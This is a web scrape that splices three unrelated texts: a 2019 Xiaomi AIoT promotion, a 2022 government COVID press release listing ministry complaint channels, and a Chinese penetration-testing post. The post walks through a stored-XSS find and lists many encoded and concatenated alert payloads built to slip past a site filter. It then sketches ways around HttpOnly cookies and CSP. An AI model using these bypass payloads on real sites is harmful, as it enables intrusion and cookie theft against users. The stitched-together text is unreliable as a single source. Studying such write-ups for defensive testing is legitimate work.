015年,吉尼斯纪录“千本斩”纪录的保持者迎战日本独臂机器人,曾经创下36分钟5秒刀砍1000卷草席的世界纪录的他,出刀速度之快,甚至能在瞬间切开子弹。在这一场机器人的酷炫技艺下,是对人类技艺谦逊、精准的效仿和传承。
4年前,智能科技挑战日本居合道大师,巅峰对决“千本斩”
3年前,人工智能战胜围棋世界冠军
两年前,AI发现了包含八颗行星的太阳系
彼时,从未间断的智能发展,即便引发了全世界的惊叹,人们对智能科技的认知,仍然停留在触不可及的尖端领域,智能的进步仿佛存在于一篇新闻推送,一场网络转播。
转眼时至2019,今年年初的政府工作报告中,已将“智能+”作为重要战略,提出人工智能赋能传统产业。这意味着人工智能正逐渐进入传统行业,传统生活领域的改造升级正在悄然发生。
从你第一次打开电视直到现在,为了找出你家时常“失踪”的遥控器,一共浪费了多少时间?
你上一次忘带家门钥匙,是什么时候?
都市独居族日益增多,经济、事业正快速自主中的女性,如何保证自己的独居安全?
这不是一场社会调查,这是智能进步中,正在为每一个人打开的脑洞
“您的快递到了”已经成为眼下日常生活里,最重要的幸福感之一,伴随新的幸福趋势,智能科技又有什么真实出现在你左右的支持?
通过智能电视遥控一切家电设备
一句话开灯关灯让双手腾出来去做更有意义的事
一个智能门铃,不仅让你拥有了名侦探柯南的变声功能,身在异地也能第一时间跟快递小哥说上一句“快递就放在家门口吧”
每个时代,都有每个时代的“百家争鸣”。今年智能科技的进步领跑,接二连三地发生在了年仅9岁的小米身上。
10月份,语音领域国际著名学者、开源语音项目Kaldi创始人、原霍普金斯大学副教授Daniel Povey正式加入小米,这在整个AI领域引起了巨大的反响,国内多位学者表示小米这一举措为中国AI语音领域做出巨大的贡献,Daniel Povey的加入会让小米在AI技术自研上带来极大的推动作用。
11月13日,胡润研究院发布《2019中国人工智能企业知识产权竞争力百强榜》,从企业的综合强度、创新能力和技术成熟度三个维度进行定量评比,对500余家中国人工智能主流企业进行定量评估,小米在一系列互联网及硬件企业中脱颖而出,名列第四。公开数据显示,2016年—2018年间,小米在AI领域申请专利684项,列居世界第11位。
目前,小米已经打造了全球领先的消费级物联网(IoT),通过其AI——小爱同学赋能,形成小米AIoT平台。截止今年上半年,该平台接入设备数超过1.96亿台(不包括手机和笔记本电脑),超过300万人拥有超过5台以上相关设备。
我们正在迎来一个由人工智能(AI)赋能的万物互联(IoT)时代。如果说过去我们与PC、手机交互,那么,未来我们将与万物交互。
2020年,一个即将到来的“AI”大年,一切智能科技的进步正在悄然发生。9岁小米,在万物互联中,跟你一切感受智能的发生!点击进入智能社会?https://s1.mi.com/m/app/hd/index.html?id=12746&client_id=180100041080&masid=19107.0002
7月8日下午,国务院联防联控机制召开发布会,介绍科学精准做好疫情防控工作有关情况。
发布会上,国家卫健委监督局副局长程有全介绍,6月28日,落实疫情防控“九不准”公众留言板正式上线,6月28日至7月6日24时,共收到13916条信息,涉及全国31个省、自治区、直辖市及新疆生产建设兵团,均及时转地方核查处理。
6月28日下午,收到信息2480条;
6月29日,收到4850条;
6月30日,收到2495条;
7月1日,收到1406条;
7月2日,收到653条;
7月3日,收到549条;
7月4日,收到599条;
7月5日,收到453条;
7月6日,收到431条。
“这个趋势大家能看出来,6月29日投诉量最多,是4850条,随着整治‘层层加码’,工作专班的跟踪督办,31个工作组的现场督导和各省份对照第九版防控方案持续整改,投诉量整体呈现逐日下降的趋势。”程有全表示。
程有全谈到,7月6日整体的数据比照6月29日整体的数据,下降了91%。截至7月7日10时,收到各省份办理反馈信息13862件,其中2253件正在办理中。办结了11609件,办结率是83.7%,整治工作取得阶段性成效。
程有全表示,下一阶段,将持续推进专项整治工作,按照整治“层层加码”专班的工作机制,继续做好线索收集、转办核实、跟踪督办、通报曝光等工作,做到全面收集、及时转办、全力核查、坚决整改,妥善解决“九不准”相关问题,切实维护人民群众的利益。
为严格落实新冠肺炎疫情防控“九不准”要求,防止和纠正工作中出现的简单化、一刀切、层层加码等问题,国务院联防联控机制有关部门专门开设群众问题反映渠道。
教育部
网址:
http://www.moe.gov.cn/jyb_hygq/hygq_tsjb/202207/t20220704_643158.html
电话:010-66092315/3315
工业和信息化部
网址:
https://www.miit.gov.cn/gyhxxhb/jgsj/xxtxglj/wzpz/ztzl/txxckzlyqfk/zcgf/index.html
电话:12381
交通运输部
电话:12328,010-65292831
农业农村部
网址:
https://www.moa.gov.cn/wsxfbzxx/xfwy/ministerMailBox.html
电话:010-66179655
商务部
网址:
http://gzly.mofcom.gov.cn/info/loginOne
电话:010-85093881
文化和旅游部
网址:
https://zwgk.mct.gov.cn/zfxxgkml/scgl/202206/t20220624_934098.html
电话:010-65201455
国家卫生健康委
网址:
http://www.nhc.gov.cn/nccjmly/denglu.html
海关总署
网址:
http://www.customs.gov.cn/eportal/ui?pageId=374003
电话:12360
市场监管总局
网址:
https://gkml.samr.gov.cn/nsjg/zfjcj/202206/t20220629_348242.html
国家邮政局
网址:
https://spb.gov.cn/gjyzj/jiubz/hdjl_yqfkjbz.shtml
电话:12305
一图速览:7月8日
国务院联防联控机制新闻发布会
◆◆
◆◆
编辑:张锦华
校对:刘荣章
审核:王智韬
来源:澎湃新闻、健康中国
点分享
点收藏
众号:渗透师老A
专注分享渗透经验,干货技巧....
作者:学员-astronaut
犹记某位师傅所说,有活动的地方就有可能出现漏洞,毕竟是新的业务点,本次漏洞也是与厂商搞的活动有关.漏洞已提交!
经过信息收集,发现其推出了众测活动,类似于0元试用,这无伤大雅,但其中的众测计划属实耐人寻味,因为我输入了<h1>加油</h1>以后,它返回给我的结果如下图所示
这说明填写众测计划时,是可以执行html语句的,这里可以尝试的操作是构造钓鱼链接,比如<a href="https://bbs.zkaq.cn/">我很来劲</a>
那试试能不能执行js呢,成立了就收获存储xss一枚
经初步测试发现,普通的弹窗对它来说是不起作用的
开始fuzz
利用拼接函数
<svg onload="a(this);function a(){}(alert`1`)">
<details ontoggle=this['ale'+'rt']`1` open>
<audio src/onerror=self['pro'+'mpt'](1)>
<img/src=1 onerror=window.alert(1)>
拦截
尝试不同属性
<form action=javascript:alert(1)><input type=submit>
<object data=javascript:alert(1)>
拦截
尝试不同标签
<body onload=alert(1)>
<marquee onstart=alert(1)>
<audio src onloadstart=alert(1)>
<video onloadstart=alert(1)><source>
<form onsubmit=alert(1)><input type=submit>
拦截
蟹不肉
编码
<details open ontoggle=eval('%61%6c%65%72%74%28%31%29') >
<details open ontoggle=eval(atob('YWxlcnQoMSk='))>
<img/src=1 onerror="eval(String.fromCharCode(97,108,101,114,116,40,49,41))">
< a href="javascript:al\u{65}rt(6)">XSS Test</ a>
最终,unicode编码成功绕过防护,网费拿下
注意:漏洞挖掘一定要点到为止,不可以非法获取网站的任何数据以及改动,作为安全人员更要在法律允许的范围内进行.未经授权的渗透一定不要干.
在发现漏洞后,尽快提交漏洞,联系厂商进行修复。
12期小老弟找工作中,本篇正好又聊到了xss,咱就扯几道面试题(总群里的)吧,同学们有更好的思路不妨一起学习交流
Q1:如何绕过http-only?
A1:首先谈谈http-only,它的作用仅仅是为了避免攻击者获得cookie信息,插还是能插的。
再看如何绕过,可以说说风哥提到的这两点 -- csrf、借助phpinfo()让页面显示cookie。
除此之外,还可以劫持钓鱼绕过,利用姿势为管理员触发xss后,当前页面即刻跳转至登陆界面,若管理员稍不留意填写了账号和密码,不就拿下了,为啥,因为登陆界面是伪造的。
还有没有啥绕过方式,有啊,比如CVE-2012-005,只要攻击者向目标站点植入超大cookie,使得http头超过apache的最大请求长度,apache便会返回400状态码,以及被http-only保护的cookie
Q2:谈一谈csp安全策略,以及如何绕过?
A2:csp即为HTTP Header中的Content-Security-Policy,它存在的目的主要是通过白名单的方式告诉浏览器允许加载和不允许加载的资源。
具体用法可以使用script-src,让浏览器只能加载指定规则下的js代码,其他的都一律拒绝。
接着讲讲咋个绕过
姿势1 -- jsonp绕过,啥是jsonp,它首先基于json格式,存在的目的在于解决跨域请求资源
而它的原理则是动态地插入带有跨域url的script标签,然后调用回调函数,将用户所需的json数据作为参数传入,通过一些逻辑把数据显示在页面
说到这儿,自然是明白如何通过它绕过csp了,还不是因为它允许不安全的回调方法,从而给攻击者执行xss创造了机会?直接callback=alert`1`就完事儿了。
姿势2 -- 利用iframe的srcdoc属性绕过csp,但有前提,那就是应用得允许加载来自白名单域的iframe,满足了这个前提就可以插了,咋插?用手插
*请认真填写需求信息,我们会在24小时内与您取得联系。